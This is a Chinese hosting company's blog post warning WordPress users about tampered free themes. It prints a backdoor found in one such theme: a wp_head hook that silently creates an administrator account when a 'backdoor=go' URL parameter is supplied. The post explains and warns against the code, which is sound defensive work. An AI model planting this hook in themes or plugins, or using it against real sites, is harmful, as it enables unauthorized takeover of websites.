香港独立IP空间
香港php空间
美国php空间
域名注册

使用wordpress建站的站长朋友们不在少数,无忧主机php虚拟主机就有很多wordpress的客户。一般我们使用wordpress建站,都是先安装一个开源程序,然后到网上选择一个我们喜欢或者适合的主题,进行安装。这些主题中,大部分都是免费的主题。这就可能涉及到一个问题,那就是安全问题。由于免费的主题大家都可以下载到,一些无良的商家专门收集这些主题,往主题里添加广告、暗链,甚至恶意代码,达到他们不可告人的秘密。最近无忧主机小编就遇到了这样一个被人修改过的主题,添加的代码如下:

add_action('wp_head', 'holeinthewall'); 
function holeinthewall() { 
If ($_GET['backdoor'] == 'go') { 
require('wp-includes/registration.php'); 
If (!username_exists('username')) { 
$user_id = wp_create_user('username', 'password'); 
$user = new WP_User($user_id); 
$user->set_role('administrator'); 
} 
} 
}

以上主题小编请公司的程序员大神解释了一下,他给出的解释是:这竟然是一个自动添加管理员的代码!如果把上面的代码添加到functions.php文件中,会自动创建一个管理员,名为username,密码为password的管理账号!这样太恐怖了,如果真的创建成功,就可以任意修改网站内容了。

所以无忧主机小编在这里给大家提个醒:最好不要使用免费或者盗版的主题,以免给自己的网站带来意想不到的麻烦。

无忧主机相关文章推荐阅读:

WORDPRESS利用插件让后台变为中文

WORDPRESS让用户随心所欲的调整网页字体大小

WORDPRESS网站迁移中文名称的图片不显示原因分析

本文地址:http://www.51php.com/wordpress/19692.html

喜欢本文或觉得本文对您有帮助,请分享给您的朋友 ^_^

阅读本文的人还阅读: